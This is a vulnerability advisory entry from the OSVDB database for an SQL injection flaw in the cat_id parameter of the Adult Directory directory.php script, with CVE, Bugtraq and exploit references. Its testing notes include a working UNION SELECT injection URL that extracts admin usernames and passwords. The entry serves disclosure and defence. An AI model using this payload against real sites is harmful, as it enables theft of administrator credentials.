Adult Directory directory.php cat_id Variable SQL Injection

2007-07-27T00:00:00
ID OSVDB:37267
Type osvdb
Reporter OSVDB
Modified 2007-07-27T00:00:00

Description

Manual Testing Notes

http://[target]/directory.php?ax=list&sub=7&cat_id=-1//UNION//ALL//SELECT//1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13//FROM//admin/*

References:

Mail List Post: http://www.attrition.org/pipermail/vim/2007-July/001728.html ISS X-Force ID: 35683 Generic Exploit URL: http://www.milw0rm.com/exploits/4238 FrSIRT Advisory: ADV-2007-2695 CVE-2007-4056 Bugtraq ID: 25135